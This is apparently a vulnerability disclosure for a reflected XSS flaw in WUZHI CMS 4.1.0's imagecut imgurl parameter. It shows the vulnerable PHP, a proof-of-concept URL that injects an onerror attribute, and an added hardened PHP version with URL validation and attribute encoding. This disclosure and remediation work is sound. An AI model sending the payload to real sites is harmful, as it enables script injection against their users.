wuzhicms v4.1.0 imgurl reflected xss vulnerability

An XSS vulnerability was discovered in WUZHI CMS 4.1.0.

There is a reflected XSS vulnerability that allows remote attackers to inject arbitrary web script or HTML via the imgurl parameter of /index.php?m=attachment&f=imagecut&v=init

Vulnerability file: coreframe/app/attachment/imagecut.php

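    function init() {
        if(isset($GLOBALS['imgBase64'])) {
            ......
        } else {
            if(!empty($GLOBALS['imgurl'])) {
                // Request value is decoded and kept without validation or HTML encoding
                $imgurl = urldecode($GLOBALS['imgurl']);
            }
            // The template is included with $imgurl in scope
            include T('attachment','imagecut');
        }
    }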

PoC:

http://example.com/index.php?m=attachment&f=imagecut&v=init&imgurl=1"+onerror%3d"alert(1)%3b//
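
A hardened version of the imgurl handling, as an added example (not WUZHI CMS code and not part of the original gist). It assumes the imagecut template writes $imgurl into a quoted HTML attribute such as an img src, which the PoC's quote-breaking value suggests; validate_imgurl, attr and render_img are hypothetical names.

```php
<?php
// Added example, not WUZHI CMS code; function names are hypothetical.

// Return $raw if it is an acceptable image URL, otherwise null.
function validate_imgurl(string $raw): ?string
{
    // PHP already URL-decodes query parameters once, so no second urldecode().
    // Reject empty input, whitespace, control bytes, quotes, <, >, ` and \.
    if ($raw === '' || preg_match('/[\x00-\x20\x7f"\'<>`\\\\]/', $raw)) {
        return null;
    }
    $parts = parse_url($raw);
    if ($parts === false) {
        return null;
    }
    if (isset($parts['scheme'])) {
        // Absolute URL: only http(s) with a host.
        $ok = in_array(strtolower($parts['scheme']), ['http', 'https'], true);
        return ($ok && !empty($parts['host'])) ? $raw : null;
    }
    // Relative URL: site-local path only, not protocol-relative "//host".
    return ($raw[0] === '/' && strncmp($raw, '//', 2) !== 0) ? $raw : null;
}

// Encode a value for use inside a quoted HTML attribute.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Render the tag the template would emit (assumed shape), or a fallback.
function render_img(string $raw): string
{
    $url = validate_imgurl($raw);
    return $url === null ? '<!-- imgurl rejected -->' : '<img src="' . attr($url) . '">';
}

$samples = [
    '1" onerror="alert(1);//',      // PoC value from the page, as PHP decodes it
    '/uploadfile/photo.jpg',        // constructed
    'https://example.com/a.png',    // constructed
    '//other.example/a.png',        // constructed, protocol-relative
    'javascript:void(0)',           // constructed, disallowed scheme
];
foreach ($samples as $s) {
    printf("%-26s => %s\n", $s, render_img($s));
}
// Encoding alone also keeps the PoC inside the attribute value:
echo '<img src="' . attr($samples[0]) . '">', "\n";
```

Validation and output encoding are independent layers: the encoding in attr() is what stops the attribute breakout, while validate_imgurl() limits which URLs are accepted at all.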
